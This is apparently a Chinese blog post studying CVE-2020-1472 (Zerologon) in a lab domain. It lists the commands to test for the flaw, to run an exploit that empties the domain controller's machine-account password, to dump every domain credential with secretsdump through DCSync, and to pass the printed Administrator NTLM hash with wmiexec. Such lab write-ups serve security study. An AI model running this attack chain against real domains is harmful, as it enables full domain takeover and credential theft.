CVE-2020-1472 NetLogon 漏洞学习

相关项目、EXP

安装依赖

1
python -m pip install -r requirement.txt

检测漏洞

1
python zerologon_tester.py DCNAME DCIP

利用过程

检测漏洞

1
python zerologon_tester.py dc01 192.168.214.200

It may take a while due to the network stability

Image

EXP 指控机器账户

先 dump 出结果做对比

Image

1
python cve-2020-1472-exploit.py dc01 192.168.214.200

Image

看到 DC01 用户密码已被置空

Image

查询验证

Image

导出用户凭据

域控的机器账户可以使用 DCSync 导出域内所有用户凭据

1
python secretsdump.py ust4.fun/'DC01$'@192.168.214.200 -no-pass

Image

获得域管 Administrator 的 hash

1
Administrator:500:aad3b435b51404eeaad3b435b51404ee:214114172ade9bb8d8feca6d765e0cf9:::

HASH 传递

使用 wmiexec 进行 hash 传递,为了解决乱码使用 GBK 编码(-codec gbk)

1
python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:214114172ade9bb8d8feca6d765e0cf9 ust4.fun/[email protected] -codec gbk

Image


CVE-2020-1472 NetLogon 漏洞学习
https://52hertz.tech/2024/01/08/CVE-2020-1472/
作者
Ustin1an
发布于
2024年1月8日
许可协议